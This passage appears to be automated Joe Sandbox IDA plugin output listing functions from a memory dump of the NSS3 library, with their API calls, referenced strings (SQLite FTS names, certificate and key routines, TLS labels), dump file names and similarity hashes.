sqlite3_mprintf.NSS3(optimize), ref: 6C52F1D1
sqlite3_free.NSS3(?), ref: 6C52F368

Strings

matchinfo, xrefs: 6C52F04F, 6C52F082, 6C52F0C2, 6C52F0F2, 6C52F124, 6C52F169
snippet, xrefs: 6C52EF05, 6C52EF37, 6C52EF7C
fts3tokenize, xrefs: 6C52F30F
fts4, xrefs: 6C52F2AD
simple, xrefs: 6C52ED79
fts3, xrefs: 6C52F247
fts3_tokenizer, xrefs: 6C52EE1A, 6C52EEA8
offsets, xrefs: 6C52EFAF, 6C52EFDF, 6C52F01F
optimize, xrefs: 6C52F199, 6C52F1CC, 6C52F211
fts4aux, xrefs: 6C52ECF9
unicode61, xrefs: 6C52EDB5
porter, xrefs: 6C52ED97

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 241151795f640eb910694d4df7ecff61d6617c9a5f1e273a8383478ee8b75057
Instruction ID: 619aad5bde928cb28cb2640fd49a0284954284cfa96dc280dc3bf721dc98319e
Opcode Fuzzy Hash: 241151795f640eb910694d4df7ecff61d6617c9a5f1e273a8383478ee8b75057
Instruction Fuzzy Hash: 6C02F3B1B043119BD7049F72AC8572F32F1BFC5608F144A3CD85A87B80EB79E8468796

Function 6C5A7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C5A7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5A7D1E

Part of subcall function 6C5A7870: SECOID_FindOID_Util.NSS3(?,?,?,6C5A91C5), ref: 6C5A788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C5A7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C5A7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5A7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5A7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C5A7E58

Part of subcall function 6C5A7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A91C5), ref: 6C5A78BB
Part of subcall function 6C5A7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C5A91C5), ref: 6C5A78FA
Part of subcall function 6C5A7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A7930
Part of subcall function 6C5A7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A7951
Part of subcall function 6C5A7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5A7964
Part of subcall function 6C5A7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5A797A
Part of subcall function 6C5A7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5A7988
Part of subcall function 6C5A7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C5A7998
Part of subcall function 6C5A7870: free.MOZGLUE(00000000), ref: 6C5A79A7
Part of subcall function 6C5A7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C5A91C5), ref: 6C5A79BB
Part of subcall function 6C5A7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C5A91C5), ref: 6C5A79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5A7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5A7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5A7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C5A8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5A8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C5A8093
SECOID_FindOID_Util.NSS3 ref: 6C5A7F29

Part of subcall function 6C5A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C548298,?,?,?,6C53FCE5,?), ref: 6C5A07BF
Part of subcall function 6C5A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5A07E6
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A081B
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C5A8072
SECOID_FindOID_Util.NSS3 ref: 6C5A80F5

Part of subcall function 6C5ABC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C5A800A,00000000,?,00000000,?), ref: 6C5ABC3F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 3767bcb4caebfa0f96d5d2d3d677031e45d7a53cd1674102c844e784dd253e16
Instruction ID: c4f66646389adf9f210da8226e8abb5417c27c1212c4f702a1851be418dc33bb
Opcode Fuzzy Hash: 3767bcb4caebfa0f96d5d2d3d677031e45d7a53cd1674102c844e784dd253e16
Instruction Fuzzy Hash: AFE17C716043019FE700CF6ACC80B5EB7E5AF88348F14496DE89A9BB55E731EC16CB92

Function 6C531C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C531C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C531C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C531CA1
GetLengthSid.ADVAPI32(?), ref: 6C531CA9
malloc.MOZGLUE(00000000), ref: 6C531CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C531CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C531CE4
GetLengthSid.ADVAPI32(?), ref: 6C531CEC
malloc.MOZGLUE(00000000), ref: 6C531CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C531D0F
CloseHandle.KERNEL32(?), ref: 6C531D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C531D4D
GetLastError.KERNEL32 ref: 6C531D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C531D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C531D7A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: a287fc1c4bfa13e472e9054a0eea80d2f8444d2aab0694c8581144c2c3744cc4
Instruction ID: 11620be70e9cda08f21d281f0ba2098c61ed7a49e388cb669b5a3ad3aa8e82d9
Opcode Fuzzy Hash: a287fc1c4bfa13e472e9054a0eea80d2f8444d2aab0694c8581144c2c3744cc4
Instruction Fuzzy Hash: A93175B1A00219AFEF11EF66CC88BAABBB8FF4A354F004565F609D2150E7305994CF6D

Function 6C533D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C533DFB
__allrem.LIBCMT ref: 6C533EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C533FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C534047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5340DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C53415F
__allrem.LIBCMT ref: 6C53416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C534288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5342AB
__allrem.LIBCMT ref: 6C5342B7

Strings

%lld, xrefs: 6C533FB2
%03d, xrefs: 6C5342E8
%02d, xrefs: 6C534086
%04d, xrefs: 6C53407B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 91602f94af2a09bafde33748d5a5a012cfefd235611f6cfa6aaab0b812b498a0
Instruction ID: 12561d1a3bb558a67f25611c3a2cbb60b0d7b34d9a0617407ebbed39e0f55592
Opcode Fuzzy Hash: 91602f94af2a09bafde33748d5a5a012cfefd235611f6cfa6aaab0b812b498a0
Instruction Fuzzy Hash: A8F13271A087409FD715CF38CC80A6BBBE6AFC6304F548A2DF4899B651F735D8868B46

Function 6C53EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C53EF63

Part of subcall function 6C5487D0: PORT_NewArena_Util.NSS3(00000800,6C53EF74,00000000), ref: 6C5487E8
Part of subcall function 6C5487D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C53EF74,00000000), ref: 6C5487FD
Part of subcall function 6C5487D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C54884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C53F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C53F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C53F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C53F374
PL_strcasecmp.NSS3(6C682FD4,?), ref: 6C53F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C53F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C53F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C53F67D
CERT_DestroyName.NSS3(?), ref: 6C53F68B

Part of subcall function 6C548320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C548338
Part of subcall function 6C548320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C548364
Part of subcall function 6C548320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C54838E
Part of subcall function 6C548320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5483A5
Part of subcall function 6C548320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5483E3

Part of subcall function 6C5484C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5484D9
Part of subcall function 6C5484C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C548528

Part of subcall function 6C548900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C548955

Strings

oid., xrefs: 6C53F2CF
", xrefs: 6C53F21B
*, xrefs: 6C53F3C6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 71091e166d9b411a6100501f91313922b924fb8ea4e52241c5d6033036c7a650
Instruction ID: 82790fd7e7c09742dfd8c86cfff96d5b193f313fa5dedc9b0aaae1c778875828
Opcode Fuzzy Hash: 71091e166d9b411a6100501f91313922b924fb8ea4e52241c5d6033036c7a650
Instruction Fuzzy Hash: D42236716083618BD710CE28DC9076AB7E6ABC5318F185BAEE49DC7B91F7319C05CB92

Function 6C4E1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4E1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4E1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C4E1FB7

Strings

unknown error, xrefs: 6C4E2291
attached databases must use the same text encoding as main database, xrefs: 6C4E20CA
sqlite_master, xrefs: 6C4E1C61
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C4E1F83
sqlite_temp_master, xrefs: 6C4E1C5C
table, xrefs: 6C4E1C8B
abort due to ROLLBACK, xrefs: 6C4E2223
another row available, xrefs: 6C4E2287
no more rows available, xrefs: 6C4E2264
unsupported file format, xrefs: 6C4E2188

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: f497823204e208800fe9a6657f8d79197594b2f27a7ef9dc4bca7d03592e149d
Instruction ID: 0e7fac645f1fc846ad06e9f1294a634250ba8e280ea9e02f3e9ba5efff94d209
Opcode Fuzzy Hash: f497823204e208800fe9a6657f8d79197594b2f27a7ef9dc4bca7d03592e149d
Instruction Fuzzy Hash: 7612D3706083418FD715CF19C084E5AB7F2BF8931AF1A895DE9859BB52DB31EC46CB82

Function 6C505F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

BINARY, xrefs: 6C508708, 6C508737, 6C5087B8
ON clause references tables to its right, xrefs: 6C506BEC
-, xrefs: 6C506228
-, xrefs: 6C5062F9
2, xrefs: 6C5065B4
NOCASE, xrefs: 6C508703
sub-select returns %d columns - expected %d, xrefs: 6C50805F
u, xrefs: 6C5081DA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 32617fc09300e4845d9a32bc247ea237d768b46b19ac922efcf1da4be3e01960
Instruction ID: d5f16dc8b16229f8b03cfb482003de5eeb40537a02f1a91984309a36b172827b
Opcode Fuzzy Hash: 32617fc09300e4845d9a32bc247ea237d768b46b19ac922efcf1da4be3e01960
Instruction Fuzzy Hash: 444371747087418FD304CF19C890A5AB7E2BFC9358F148A5DE899CB756D731E886CB92

Function 6C5AEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5ADAE2,?), ref: 6C5AC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5AF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5AF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C5AF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5AF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C67218C), ref: 6C5AF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C5AF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5AF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5AF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C5AF210

Part of subcall function 6C5552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C5AF1E9,?,00000000,?,?), ref: 6C5552F5
Part of subcall function 6C5552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C55530F
Part of subcall function 6C5552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C555326
Part of subcall function 6C5552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C5AF1E9,?,00000000,?,?), ref: 6C555340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5AF227

Part of subcall function 6C59FAB0: free.MOZGLUE(?,-00000001,?,?,6C53F673,00000000,00000000), ref: 6C59FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C5AF23E

Part of subcall function 6C59BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C54E708,00000000,00000000,00000004,00000000), ref: 6C59BE6A
Part of subcall function 6C59BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5504DC,?), ref: 6C59BE7E
Part of subcall function 6C59BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C59BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5AF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C5AF3A8

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C5AF3B3

Part of subcall function 6C552D20: PK11_DestroyObject.NSS3(?,?), ref: 6C552D3C
Part of subcall function 6C552D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C552D5F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: a6f47344e3ba60c1601535a2813087a036a35378c8f941fbc4bf735681ade5c4
Instruction ID: ee81b6612a57f3637ae1ce900a05c288eeb1b1495c9565ecbfd90cbe9a403441
Opcode Fuzzy Hash: a6f47344e3ba60c1601535a2813087a036a35378c8f941fbc4bf735681ade5c4
Instruction Fuzzy Hash: F7D13CB6E016059BEB14CFEADC80A9EB7B5FF88308F158629D915A7711E731EC06CB50

Function 6C5DDE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C5B7FFA,00000000,?,6C5E23B9,00000002,00000000,?,6C5B7FFA,00000002), ref: 6C5DDE33

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

Part of subcall function 6C5DD000: PORT_ZAlloc_Util.NSS3(00000108,?,6C5DDE74,6C5B7FFA,00000002,?,?,?,?,?,00000000,6C5B7FFA,00000000,?,6C5E23B9,00000002), ref: 6C5DD008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C5B7FFA,00000000,?,6C5E23B9,00000002,00000000,?,6C5B7FFA,00000002), ref: 6C5DDE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C5DDEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5DE069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5DE121
PK11_FreeSymKey.NSS3(?), ref: 6C5DE14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C5DE195
PR_GetCurrentThread.NSS3 ref: 6C5DE1FC

Part of subcall function 6C5D2460: PR_SetError.NSS3(FFFFE005,00000000,6C677379,00000002,?), ref: 6C5D2493

Strings

application data, xrefs: 6C5DDFE0
handshake data, xrefs: 6C5DDFF7
key, xrefs: 6C5DE046
early application data, xrefs: 6C5DDFC9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 75354de1bbd8bace6c5c8ec8b3c45b6d30cd79d71843ea49de78b4388256aae0
Instruction ID: 028086cebdf0d6275a36fc595ebc73b96d06f051bfaafad739bf3edd700b8a66
Opcode Fuzzy Hash: 75354de1bbd8bace6c5c8ec8b3c45b6d30cd79d71843ea49de78b4388256aae0
Instruction Fuzzy Hash: AAC1F271B003169BDB04CF69CC80BAAB7B5FF49318F054528E909ABB51E371F954CBA9

Function 6C583850 Relevance: 21.2, APIs: 14, Instructions: 233COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C58389F
EnterCriticalSection.KERNEL32(?), ref: 6C5838B3
PR_Unlock.NSS3(?), ref: 6C5838F1
TlsGetValue.KERNEL32 ref: 6C58390F
EnterCriticalSection.KERNEL32(?), ref: 6C583923
PR_Unlock.NSS3(?), ref: 6C583972
TlsGetValue.KERNEL32 ref: 6C583996
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5839AE
PR_Unlock.NSS3(?), ref: 6C5839DB
PR_Unlock.NSS3(?), ref: 6C583A16

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
